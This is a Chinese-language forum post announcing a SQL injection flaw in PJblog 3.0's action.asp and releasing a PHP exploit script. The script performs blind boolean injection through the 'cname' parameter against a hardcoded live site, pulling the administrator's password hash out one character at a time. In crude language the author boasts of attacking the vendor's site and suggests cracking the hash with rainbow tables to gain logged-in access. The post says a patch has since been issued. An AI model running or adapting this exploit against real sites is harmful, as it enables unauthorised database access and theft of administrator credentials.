作者:bink
影响版本:3.0
信息来源:零客网安www.0kee.com
Author:bink
漏洞文件:action.asp
很SB的洞。
第14行
strcname=request("cname") set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
这个贱B下午就跑人官方去捣乱了。
强奸出的密码是sha1,突死有彩虹表的人继续强奸吧
直接吊hashkey可以进前台操蛋
变量是双引号包着的,所以工具吊不出。
扔个exp。 好不好使看各位造化鸟。
<?php /* PJblog V3.0 0day exp code by 小蟑螂&bink www.0kee.com www.t00ls.net 09.04.22 */ $url="http://www.pjhome.net"; //注入地址 $var_name="puterjam"; //管理员 $var_key="check_right"; if ($_SESSION["LenI"]){ $LenI=$_SESSION["LenI"]; }else{ $LenI=1; } for($i=$LenI;$i<=40;$i++){ if($_SESSION["LenDo"]){ $StaAsc=$_SESSION["LenDo"]; }else{ $StaAsc=31; } echo "Scan password len:".$i." ;asc form ".$StaAsc." to 127"; for($j=$StaAsc;$j<=127;$j++){ $newurl=$url.'/action.asp?action=checkAlias&cname=firebug_plugins_firediff"%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c'.$i.'%2c1%29%29%20From%20blog_member%20where%20mem_name=/''.$var_name.'/'%29%3e'.$j.'%20and%20"1"="1'; $var_pagelen=file_get_contents($newurl); $var_newpagelen=strpos($var_pagelen,$var_key); if($var_newpagelen == true){ $_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr($j); unset($_SESSION["LenDo"]); $_SESSION["LenI"]=$i+1; doReload(); break; } if($j == $StaAsc+10){ doReload(); break; } } } if ($_SESSION["LenI"]==40 && !($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; } function doReload(){ ?> <script language="javascript"> <!-- window.setTimeout('location.reload()',1000); //--> </script> <?php } ?>
此文发布时官方已经打了补丁
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论